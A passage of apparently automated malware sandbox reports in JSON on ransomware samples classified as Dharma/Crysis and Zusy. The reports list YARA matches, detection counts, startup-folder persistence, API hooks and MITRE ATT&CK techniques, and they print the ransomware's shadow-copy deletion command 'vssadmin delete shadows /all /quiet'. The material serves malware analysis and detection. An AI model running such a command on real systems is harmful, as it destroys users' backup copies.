\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.msi\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\Proof.cab\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.msi\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\InfoPathMUI.msi\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\OnoteLR.cab\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeLR.cab\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.msi\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\osetupui.dll\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\Program Files\\7-Zip\\7z.sfx\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\Program Files\\7-Zip\\7zG.exe\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\Program Files\\7-Zip\\descript.ion\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Esl\\AiodLite.dll\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\AppCenter_R.aapp\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "18/22 Antivirus vendors marked dropped file \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" as malicious (classified as \"Trojan.Ransom.Crysis\" with 81% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"dharma_ransomware\" matched file \"sample.bin\" as \"Rule to detect Dharma/Crysis ransomware\" (Author: Marc Rivero | Hybrid Analysis)\n YARA signature \"dharma_ransomware\" matched file \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe.2434220927\" as \"Rule to detect Dharma/Crysis ransomware\" (Author: Marc Rivero | Hybrid Analysis)\n YARA signature \"MALWARE_Win_Dharma\" matched file \"sample.bin\" as \"Detects Dharma ransomware\" (Author: ditekSHen)\n YARA signature \"MALWARE_Win_Dharma\" matched file \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe.2434220927\" as \"Detects Dharma ransomware\" (Author: ditekSHen)", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-27", "type": 8, "relevance": 7, "name": "Drops executable files to the application program directory (%ProgramData%)", "description": "File type \"PE32 executable (GUI) Intel 80386 for MS Windows\" was dropped at \"%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileA@KERNEL32.DLL\" in \"mode.com\"\n \"FindNextFileA@KERNEL32.DLL\" in \"mode.com\"\n \"FindNextFileW@KERNEL32.DLL\" in \"mode.com\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"mode.com\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"mode.com\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "target-4", "type": 9, "relevance": 10, "name": "Deletes volume snapshots (often used by ransomware)", "description": "Process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00004048)", "origin": "Monitored Target", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43
https://hybrid-analysis.com/sample/94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43
Hybrid Analysis - Ransomware
{"size": 605804, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43", "sha256": "94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43", "av_detect": 87, "vx_family": "Zusy.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 162, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 605808, "sha256": "9f50c1f51b3e561cbfa53f36525bba6f7af227c397a6ab2d1953d24e6a84cd39", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "085cda53603755dc.exe (PID: 2940)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00004900", "name": "94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe", "normalized_path": "C:\\94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe", "sha256": "94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43", "av_label": "Gen:Variant.Zusy", "av_matched": 14, "av_total": 22}, {"uid": "00000000-00002968", "parentuid": "00000000-00004900", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe *", "sha256": "9f50c1f51b3e561cbfa53f36525bba6f7af227c397a6ab2d1953d24e6a84cd39"}, {"uid": "00000000-00002940", "parentuid": "00000000-00002968", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZXQTRG", "sha256": "9f50c1f51b3e561cbfa53f36525bba6f7af227c397a6ab2d1953d24e6a84cd39"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004900)\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a 